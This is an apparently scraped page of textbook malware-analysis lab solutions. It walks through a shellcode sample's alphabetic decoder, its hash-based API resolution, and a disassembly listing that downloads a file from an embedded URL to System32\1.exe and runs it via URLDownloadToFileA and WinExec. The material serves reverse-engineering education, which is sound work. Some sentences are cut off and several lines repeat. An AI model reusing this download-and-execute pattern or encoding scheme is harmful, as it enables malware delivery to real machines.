The shellcode writes %SystemRoot%\System32\1.exe and executes it.
The shellcode downloads a file from a URL stored within the encoded payload, writes it to disk, and executes it.

). You can set OllyDbg as your just-in-time debugger by selecting Options ▸ Just-in-Time Debugging ▸ Make OllyDbg Just-in-Time Debugger. If you do not set a just-in-time debugger, you can still run the program by specifying the shellcode_launcher.exe program as the executable to debug, but you must also be sure to provide the program arguments as well.

The shellcode decoder starts at ❶ in . It uses an alphabetic encoding with each encoded byte between 0x41 (A) and 0x50 (P). Each payload byte is stored in the low 4-bit nibble of two encoded bytes. The decoder loads each pair of encoded bytes, subtracts the base value 0x41, shifts and adds the two values, and stores the value back to memory. The push shown at ❷ is used to transfer control to the payload with the retn at ❸.

to manually resolve import functions. The findKernel32Base function returns the location of kernel32.dll in memory, and the findSymbolByHash function manually parses the provided DLL in memory, looking for the export symbol whose name hashes to the given DWORD value. These function pointers are stored back onto the stack for use later. shows the decoded shellcode searching for function imports.

shows the main functionality of the shellcode. The malware retrieves the system directory at ❶, and then appends the string 1.exe at ❷. This is used as the local filesystem path argument to URLDownloadToFileA called at ❸. This function is commonly found in shellcode. One function call performs an HTTP GET to the URL the code specifies and stores it at the specified file path. Here, the URL is the string stored at the end of the decoded shellcode. Finally, the shellcode executes the downloaded file at ❹ before cleanly exiting.

Example C-190. Shellcode payload

0000031E   mov     [ebp-18h], eax 00000321   push    80h 00000326   lea     edi, [ebx+48h] 00000329   push    edi 0000032A   call    dword ptr [ebp-8] ; GetSystemDirectoryA ❶ 0000032D   add     edi, eax 0000032F   mov     dword ptr [edi], 652E315Ch ; "\\1.e" ❷ 00000335   mov     dword ptr [edi+4], 6578h   ; "xe\x00" 0000033C   xor     ecx, ecx 0000033E   push    ecx 0000033F   push    ecx 00000340   lea     eax, [ebx+48h] 00000343   push    eax             ; localFileSystemPath 00000344   lea     eax, [ebx+7] 00000347   push    eax             ; URL to download 00000348   push    ecx 00000349   call    dword ptr [ebp-18h] ; URLDownloadToFileA ❸ 0000034C   push    5 00000351   lea     eax, [ebx+48h]      ; path to executable 00000354   push    eax 00000355   call    dword ptr [ebp-14h] ; WinExec ❹ 00000358   call    dword ptr [ebp-10h] ; GetCurrentProcess 0000035B   push    0 00000360   push    eax 00000361   call    dword ptr [ebp-0Ch] ; TerminateProcess

Назад: Lab 18-5 Solutions

Дальше: Lab 19-2 Solutions

The shellcode writes %SystemRoot%\System32\1.exe and executes it.The shellcode downloads a file from a URL stored within the encoded payload, writes it to disk, and executes it.

The shellcode writes %SystemRoot%\System32\1.exe and executes it.
The shellcode downloads a file from a URL stored within the encoded payload, writes it to disk, and executes it.